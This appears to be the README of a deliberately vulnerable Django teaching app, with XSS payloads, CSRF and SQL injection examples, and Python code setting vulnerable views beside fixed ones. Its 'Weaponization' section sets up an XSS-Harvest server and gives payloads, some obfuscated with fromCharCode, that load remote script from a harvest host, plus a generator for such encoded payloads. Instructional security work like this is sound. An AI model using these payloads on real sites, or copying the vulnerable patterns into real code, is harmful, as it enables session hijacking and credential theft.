Exploitable
A Django application full of security holes for instructional purposes.
Cross Site Scripting (XSS)
The 'Branch Finder' has a reflected XSS, and the profile page has a persistent (stored) XSS.
Reflected
"){}; }; alert("jello"); //
Persistent
<scrscriptipt>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 115, 109, 101, 108, 108, 111, 39, 41, 59))</scrscriptipt>
Resources
- https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- http://ha.ckers.org/xsscalc.html
- http://jdstiles.com/java/cct.html
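The two payloads above rely on two different mistakes: the reflected one breaks out of a JavaScript string literal, and the stored one reassembles a tag after a one-pass filter deletes the word "script" from the middle of `<scrscriptipt>`. The following is an added example, written for this README and not taken from Exploitable's source; the sink shapes (`findBranch("...")` inside an inline script, a bio rendered through a naive strip) are assumptions about what the vulnerable pages do, and each is shown next to a context-correct fix.

```python
import html
import json
import re

# The two payloads from this README, as constructed inputs.
REFLECTED_PAYLOAD = '"){}; }; alert("jello"); //'
STORED_PAYLOAD = (
    "<scrscriptipt>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, "
    "115, 109, 101, 108, 108, 111, 39, 41, 59))</scrscriptipt>"
)


# --- Branch Finder: reflected XSS into a JavaScript string -----------------

def render_branch_finder_vulnerable(query: str) -> str:
    # Hypothetical sink: the search term is pasted into inline JS source.
    # A double quote in `query` ends the literal and everything after it is
    # parsed as code, which is what the `"){}; }; ... //` payload relies on.
    return '<script>findBranch("%s");</script>' % query


def render_branch_finder_fixed(query: str) -> str:
    # json.dumps emits a JS string literal with quotes and backslashes
    # escaped; encoding '<' and '>' as well keeps a "</script>" inside the
    # input from terminating the script block at the HTML level.
    literal = json.dumps(query).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>findBranch(%s);</script>" % literal


# --- Profile page: stored XSS past a single-pass tag filter ----------------

def naive_strip_script(value: str) -> str:
    # The kind of "sanitiser" the nested-tag payload is built for: one pass
    # that deletes the word "script" and trusts whatever is left.
    return re.sub(r"script", "", value, flags=re.IGNORECASE)


def render_profile_vulnerable(bio: str) -> str:
    # Deleting "script" from "<scrscriptipt>" leaves "<script>": the filter
    # rebuilds the tag it was meant to remove.
    return '<p class="bio">%s</p>' % naive_strip_script(bio)


def render_profile_fixed(bio: str) -> str:
    # Escape for the HTML text context instead of blacklisting tag names.
    return '<p class="bio">%s</p>' % html.escape(bio, quote=True)


def contains_script_tag(markup: str) -> bool:
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    print(render_branch_finder_vulnerable(REFLECTED_PAYLOAD))
    print(render_branch_finder_fixed(REFLECTED_PAYLOAD))
    print(render_profile_vulnerable(STORED_PAYLOAD))
    print(render_profile_fixed(STORED_PAYLOAD))
```

Django templates escape `{{ bio }}` by default, so a stored payload like this only fires when a view or template opts out of auto-escaping (`|safe`, `mark_safe`, `{% autoescape off %}`); that is the first thing to look for when locating the bug in the profile page.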
Cross-Site Request Forgery (CSRF)
Transferring funds is done with a GET request that carries no CSRF protection.
SQL Injection (SQLi)
The deposit-funds form can be used to deliver an SQL injection.
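Both bank operations above, the CSRF-able transfer and the injectable deposit, can be shown side by side with their fixes in one small model. This is an added example written for this README, not Exploitable's own views; it assumes an `accounts(owner, balance)` SQLite table and models a request as (method, params, session), where the session is the victim's, because a browser attaches the victim's cookies to a forged cross-site request just as it does to a real one.

```python
import hmac
import sqlite3
from decimal import Decimal, InvalidOperation
from typing import NamedTuple, Optional


class Request(NamedTuple):
    """Assumed request shape: method, parameters (query string for GET,
    form body for POST) and the session the browser's cookies resolve to."""
    method: str
    params: dict
    session: dict


def setup_db() -> sqlite3.Connection:
    # Constructed sample data, not Exploitable's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (owner TEXT PRIMARY KEY, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("alice", 500), ("mallory", 0)])
    conn.commit()
    return conn


def balance(conn: sqlite3.Connection, owner: str) -> int:
    row = conn.execute("SELECT balance FROM accounts WHERE owner = ?", (owner,)).fetchone()
    return row[0]


def parse_amount(text: str) -> Optional[int]:
    """Strict parse: a positive whole number, or None for anything else."""
    try:
        value = Decimal(str(text).strip())
    except InvalidOperation:
        return None
    if not value.is_finite() or value <= 0 or value != value.to_integral_value():
        return None
    return int(value)


def _move(conn, sender: str, receiver: str, amount: int) -> bool:
    if balance(conn, sender) < amount:
        return False
    conn.execute("UPDATE accounts SET balance = balance - ? WHERE owner = ?", (amount, sender))
    conn.execute("UPDATE accounts SET balance = balance + ? WHERE owner = ?", (amount, receiver))
    conn.commit()
    return True


# --- CSRF: the transfer view ----------------------------------------------

def transfer_vulnerable(conn, req: Request) -> bool:
    # Any method, no token: <img src="/transfer/?to=mallory&amount=400"> on a
    # page the victim visits spends the victim's balance.
    amount = parse_amount(req.params.get("amount", ""))
    if amount is None:
        return False
    return _move(conn, req.session["user"], req.params["to"], amount)


def transfer_fixed(conn, req: Request) -> bool:
    # State changes only on POST, and only with the session-bound token.
    # Django's CsrfViewMiddleware checks unsafe methods only, so a GET-driven
    # view gains nothing from it; the method restriction is part of the fix.
    if req.method != "POST":
        return False
    sent = req.params.get("csrfmiddlewaretoken", "")
    if not hmac.compare_digest(sent, req.session["csrf_token"]):
        return False
    amount = parse_amount(req.params.get("amount", ""))
    if amount is None:
        return False
    return _move(conn, req.session["user"], req.params["to"], amount)


# --- SQL injection: the deposit view --------------------------------------

def deposit_vulnerable(conn, owner: str, amount: str) -> bool:
    # The amount is interpolated into the statement text, so an amount of
    #   1000000 WHERE owner = 'mallory' --
    # replaces the WHERE clause with one the attacker wrote.
    conn.execute("UPDATE accounts SET balance = balance + %s WHERE owner = '%s'" % (amount, owner))
    conn.commit()
    return True


def deposit_fixed(conn, owner: str, amount: str) -> bool:
    # Validate the type first, then bind with a placeholder: data and SQL
    # text never mix.
    value = parse_amount(amount)
    if value is None:
        return False
    conn.execute("UPDATE accounts SET balance = balance + ? WHERE owner = ?", (value, owner))
    conn.commit()
    return True
```

The injected deposit is a single statement with a trailing `--` comment, so it goes through drivers that refuse stacked queries; the lesson is that the fix is parameterisation, not a ban on semicolons.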
Resources
Weaponization
First, install XSS-Harvest: https://github.com/Miserlou/XSS-Harvest
Start Harvest Server
./xss-harvest.pl -l -p 9000 -r http://localhost:8000/accounts/signin/
Deliver Exploit Payload
<script src="http://localhost:9000/i"></script>
JavaScript Payload Delivery (with jQuery)
$.getScript("http://localhost:9000/i", function(){});
Char Encoded Payload Delivery
<script>eval(String.fromCharCode(36, 46, 103, 101, 116, 83, 99, 114, 105, 112, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 57, 48, 48, 48, 47, 105, 34, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 125, 41, 59));</script>
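To build or unpack payloads in this form without counting by hand, here is an added helper written for this README (not part of XSS-Harvest or Exploitable). It encodes to UTF-16 code units, which is what `String.fromCharCode` actually takes, so characters outside the BMP become a surrogate pair instead of one oversized number; the decoder reverses that the way a JS engine would. The `<script>` wrapper tag is a parameter so the same generator can emit the nested-tag variant used on the profile page.

```python
import re

# The stored payload from this README, constructed here as decoder input.
SMELLO_PAYLOAD = (
    "<scrscriptipt>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, "
    "115, 109, 101, 108, 108, 111, 39, 41, 59))</scrscriptipt>"
)


def to_utf16_units(text: str) -> list:
    # String.fromCharCode takes UTF-16 code units, so astral characters
    # (emoji and the like) must become a surrogate pair, not one big number.
    raw = text.encode("utf-16-le")
    return [int.from_bytes(raw[i:i + 2], "little") for i in range(0, len(raw), 2)]


def encode_from_charcode(js: str, tag: str = "script") -> str:
    # Same layout as the payload above: comma-space separated decimal units,
    # evaluated inside an inline script element.
    codes = ", ".join(str(u) for u in to_utf16_units(js))
    return "<%s>eval(String.fromCharCode(%s));</%s>" % (tag, codes, tag)


def decode_from_charcode(markup: str) -> str:
    m = re.search(r"String\.fromCharCode\(([\d,\s]*)\)", markup)
    if m is None:
        raise ValueError("no String.fromCharCode(...) call found")
    units = [int(n) for n in m.group(1).split(",") if n.strip()]
    # Rejoin surrogate pairs the same way a JS engine would.
    return ("".join(chr(u) for u in units)
            .encode("utf-16", "surrogatepass")
            .decode("utf-16", "surrogatepass"))


if __name__ == "__main__":
    print(decode_from_charcode(SMELLO_PAYLOAD))
    print(encode_from_charcode('$.getScript("http://localhost:9000/i", function(){});'))
```

Char-coding the body only defeats filters that look for keywords (`alert`, `getScript`) or quote characters inside the script; it does nothing against a page that correctly escapes `<` and `>` on output, which is why the nested-tag trick and the encoding are used together.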